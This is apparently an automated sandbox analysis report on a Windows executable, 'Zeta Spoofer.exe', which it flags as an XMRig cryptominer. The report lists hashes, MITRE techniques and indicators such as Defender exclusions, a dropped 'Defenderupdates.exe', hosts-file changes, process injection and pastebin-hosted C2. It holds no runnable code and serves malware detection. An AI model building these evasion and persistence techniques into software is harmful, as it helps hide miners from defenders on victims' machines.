xmrig | 57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9

Analysis

max time kernel
99s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
02/02/2025, 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Zeta Spoofer.exe
Size

16.6MB
MD5

58c13144b662425b9373d0687fd6c291
SHA1

0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a
SHA256

57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9
SHA512

c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960
SSDEEP

393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+

Score

10^/10

xmrig defense_evasion discovery execution miner persistence pyinstaller upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 2900 created 612	2900	powershell.EXE	5
PID 5068 created 612	5068	powershell.EXE	5
PID 4780 created 4440	4780	svchost.exe	135

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/3340-1137-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1142-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1144-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1143-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1140-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1141-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3340-1138-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe
4452	powershell.exe
2900	powershell.EXE
5068	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	ZetaSpoofer.exe
File created	C:\Windows\system32\drivers\etc\hosts	Defenderupdates.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Zeta Spoofer.exe

Executes dropped EXE 4 IoCs

pid	Process
4912	Zeta.exe
3200	ZetaSpoofer.exe
4904	Zeta.exe
432	Defenderupdates.exe

Loads dropped DLL 19 IoCs

pid	Process
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	pastebin.com
14	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3980	powercfg.exe
3184	powercfg.exe
4992	powercfg.exe
3892	powercfg.exe
3392	powercfg.exe
2244	powercfg.exe
1852	powercfg.exe
2272	powercfg.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	ZetaSpoofer.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Defenderupdates.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3200 set thread context of 3888	3200	ZetaSpoofer.exe	97
PID 432 set thread context of 3992	432	Defenderupdates.exe	126
PID 432 set thread context of 3376	432	Defenderupdates.exe	127
PID 432 set thread context of 3340	432	Defenderupdates.exe	128
PID 2900 set thread context of 2104	2900	powershell.EXE	132
PID 5068 set thread context of 4440	5068	powershell.EXE	135

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3340-1134-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1133-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1136-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1137-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1142-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1144-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1143-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1140-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1141-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1138-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1135-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3340-1132-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1500	sc.exe
1656	sc.exe
2904	sc.exe
1140	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000c000000023ac2-7.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9794D94A-29BB-475B-B468-9AE6B57CD9BD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1738521437"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3200	ZetaSpoofer.exe
4452	powershell.exe
4452	powershell.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
3200	ZetaSpoofer.exe
432	Defenderupdates.exe
4784	powershell.exe
4784	powershell.exe
2900	powershell.EXE
2900	powershell.EXE
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
432	Defenderupdates.exe
2900	powershell.EXE
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
5068	powershell.EXE
5068	powershell.EXE
5068	powershell.EXE
2104	dllhost.exe
2104	dllhost.exe
5068	powershell.EXE
2104	dllhost.exe
2104	dllhost.exe
5068	powershell.EXE
5068	powershell.EXE
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
5068	powershell.EXE
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
2104	dllhost.exe
5068	powershell.EXE
2104	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3384	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeShutdownPrivilege	2272	powercfg.exe
Token: SeCreatePagefilePrivilege	2272	powercfg.exe
Token: SeShutdownPrivilege	3184	powercfg.exe
Token: SeCreatePagefilePrivilege	3184	powercfg.exe
Token: SeShutdownPrivilege	1852	powercfg.exe
Token: SeCreatePagefilePrivilege	1852	powercfg.exe
Token: SeShutdownPrivilege	3980	powercfg.exe
Token: SeCreatePagefilePrivilege	3980	powercfg.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	2900	powershell.EXE
Token: SeShutdownPrivilege	3892	powercfg.exe
Token: SeCreatePagefilePrivilege	3892	powercfg.exe
Token: SeShutdownPrivilege	3392	powercfg.exe
Token: SeCreatePagefilePrivilege	3392	powercfg.exe
Token: SeShutdownPrivilege	4992	powercfg.exe
Token: SeCreatePagefilePrivilege	4992	powercfg.exe
Token: SeShutdownPrivilege	2244	powercfg.exe
Token: SeCreatePagefilePrivilege	2244	powercfg.exe
Token: SeLockMemoryPrivilege	3340	dialer.exe
Token: SeDebugPrivilege	2900	powershell.EXE
Token: SeDebugPrivilege	2104	dllhost.exe
Token: SeDebugPrivilege	5068	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	2372	svchost.exe
Token: SeIncreaseQuotaPrivilege	2372	svchost.exe
Token: SeSecurityPrivilege	2372	svchost.exe
Token: SeTakeOwnershipPrivilege	2372	svchost.exe
Token: SeLoadDriverPrivilege	2372	svchost.exe
Token: SeSystemtimePrivilege	2372	svchost.exe
Token: SeBackupPrivilege	2372	svchost.exe
Token: SeRestorePrivilege	2372	svchost.exe
Token: SeShutdownPrivilege	2372	svchost.exe
Token: SeSystemEnvironmentPrivilege	2372	svchost.exe
Token: SeUndockPrivilege	2372	svchost.exe
Token: SeManageVolumePrivilege	2372	svchost.exe
Token: SeDebugPrivilege	5068	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	2372	svchost.exe
Token: SeIncreaseQuotaPrivilege	2372	svchost.exe
Token: SeSecurityPrivilege	2372	svchost.exe
Token: SeTakeOwnershipPrivilege	2372	svchost.exe
Token: SeLoadDriverPrivilege	2372	svchost.exe
Token: SeSystemtimePrivilege	2372	svchost.exe
Token: SeBackupPrivilege	2372	svchost.exe
Token: SeRestorePrivilege	2372	svchost.exe
Token: SeShutdownPrivilege	2372	svchost.exe
Token: SeSystemEnvironmentPrivilege	2372	svchost.exe
Token: SeUndockPrivilege	2372	svchost.exe
Token: SeManageVolumePrivilege	2372	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2372	svchost.exe
Token: SeIncreaseQuotaPrivilege	2372	svchost.exe
Token: SeSecurityPrivilege	2372	svchost.exe
Token: SeTakeOwnershipPrivilege	2372	svchost.exe
Token: SeLoadDriverPrivilege	2372	svchost.exe
Token: SeSystemtimePrivilege	2372	svchost.exe
Token: SeBackupPrivilege	2372	svchost.exe
Token: SeRestorePrivilege	2372	svchost.exe
Token: SeShutdownPrivilege	2372	svchost.exe
Token: SeSystemEnvironmentPrivilege	2372	svchost.exe
Token: SeUndockPrivilege	2372	svchost.exe
Token: SeManageVolumePrivilege	2372	svchost.exe
Token: SeAuditPrivilege	2568	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2372	svchost.exe
Token: SeIncreaseQuotaPrivilege	2372	svchost.exe
Token: SeSecurityPrivilege	2372	svchost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4904	Zeta.exe
4904	Zeta.exe
4904	Zeta.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3384	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3164 wrote to memory of 4912	3164	Zeta Spoofer.exe	86
PID 3164 wrote to memory of 4912	3164	Zeta Spoofer.exe	86
PID 3164 wrote to memory of 4912	3164	Zeta Spoofer.exe	86
PID 3164 wrote to memory of 3200	3164	Zeta Spoofer.exe	87
PID 3164 wrote to memory of 3200	3164	Zeta Spoofer.exe	87
PID 4912 wrote to memory of 4904	4912	Zeta.exe	88
PID 4912 wrote to memory of 4904	4912	Zeta.exe	88
PID 4912 wrote to memory of 4904	4912	Zeta.exe	88
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 3200 wrote to memory of 3888	3200	ZetaSpoofer.exe	97
PID 2824 wrote to memory of 4592	2824	cmd.exe	106
PID 2824 wrote to memory of 4592	2824	cmd.exe	106
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3992	432	Defenderupdates.exe	126
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3376	432	Defenderupdates.exe	127
PID 432 wrote to memory of 3340	432	Defenderupdates.exe	128
